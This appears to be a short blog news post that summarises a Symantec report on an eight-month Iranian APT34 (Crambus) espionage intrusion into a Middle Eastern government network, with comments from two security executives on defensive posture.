Iranian Hackers Were Lurking For 8 Months In A Government Network 

Broadcom’s Symantec cybersecurity unit is reporting on a meticulous eight-month-long espionage campaign.  The Iranian Crambus espionage group, also known as OilRig and APT34, targeted a Middle Eastern government between February and September 2023. During the extended stay, the attackers compromised numerous computers and servers. They executed a range of activities, including the theft of files and passwords.

The attackers implanted a PowerShell backdoor named PowerExchange, which allowed them to monitor incoming emails from an Exchange Server and execute commands through surreptitious emails. The attack affected a minimum of 12 computers, and there are indications that backdoors and keyloggers were placed on dozens more systems.

In addition to deploying malware, the attackers used the publicly available administration tool Plink to configure port-forwarding rules on the compromised machines, granting them remote access through the Remote Desktop Protocol (RDP).

Evidence also suggests the attackers manipulated Windows firewall rules to facilitate remote access.

Emily Phelps, Director, Cyware had this comment:

   “Advanced persistent threat (APT) groups such as Crambus have the resources to maintain ongoing targeted attacks. The importance of organizations and government entities moving from a reactive to proactive cybersecurity posture cannot be overstated. Investing not only in threat intelligence but in technologies that enable organizations to take action on intelligence is mission critical to outpacing motivated adversaries.”

David Mitchell, Chief Technical Officer, HYAS adds this:

   “While this is not surprising, it further reinforces the need for network wide visibility and protection. Without knowing the details of said governments’ security posture internally, it appears they did not utilize protective DNS, network traffic visibility or log analysis — a combination of methods that would’ve most assuredly detected this behavior. Siloed security products continue to give customers a false sense of security and need to be deployed up and down the OSI stack in order to be effective.”

Much like the North Korean’s, the Iranians are a threat to your cybersecurity that cannot be ignored. Thus your security posture needs to take that into account or bad things will happen. As was the case here.

Leave a Reply

%d bloggers like this: